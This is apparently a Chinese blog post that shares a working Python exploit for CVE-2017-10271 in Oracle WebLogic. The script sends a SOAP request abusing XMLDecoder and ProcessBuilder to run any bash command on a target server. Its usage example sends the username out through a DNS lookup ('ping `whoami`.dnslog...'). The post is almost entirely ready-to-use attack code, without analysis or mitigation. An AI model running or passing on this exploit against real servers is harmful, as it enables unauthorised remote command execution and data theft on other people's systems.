文章作者:莫须有
命令格式:python3 CVE-2017-10271.py url command
eg:python3 CVE-2017-10271.py http://test.cve "ping \`whoami\`.dnslog.cve
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 | # -*- coding: UTF-8 -*-'''Created on 2017年12月23日@author: 莫须有<a target="_blank" href="https://www.hedysx.com/tag/cve-2017-10271" title="View all posts in CVE-2017-10271">CVE-2017-10271</a> EXP'''import requests,sysheaders = { 'User-Agent':'Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0', 'Content-Type':'text/xml'}console = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java version="1.8.0_131" class="java.beans.XMLDecoder"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>%s</string> </void> </array> <void method="start"/></void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>'''help = '''<a target="_blank" href="https://www.hedysx.com/tag/cve-2017-10271" title="View all posts in CVE-2017-10271">CVE-2017-10271</a>.py url commandeg:<a target="_blank" href="https://www.hedysx.com/tag/cve-2017-10271" title="View all posts in CVE-2017-10271">CVE-2017-10271</a>.py http://test.cve "ping \`whoami\`.dnslog.cve"'''if(len(sys.argv)<3): print(help) exit()url = sys.argv[1] + '/wls-wsat/CoordinatorPortType?wsdl'command = sys.argv[2]print(command)try: req = requests.post(url, headers = headers, timeout=5, data = console % command) if('<faultcode>S:Server</faultcode><faultstring>0</faultstring>' in req.text): print('Success!') else: print('Fail!')except: print('Error!') |
评论 (0)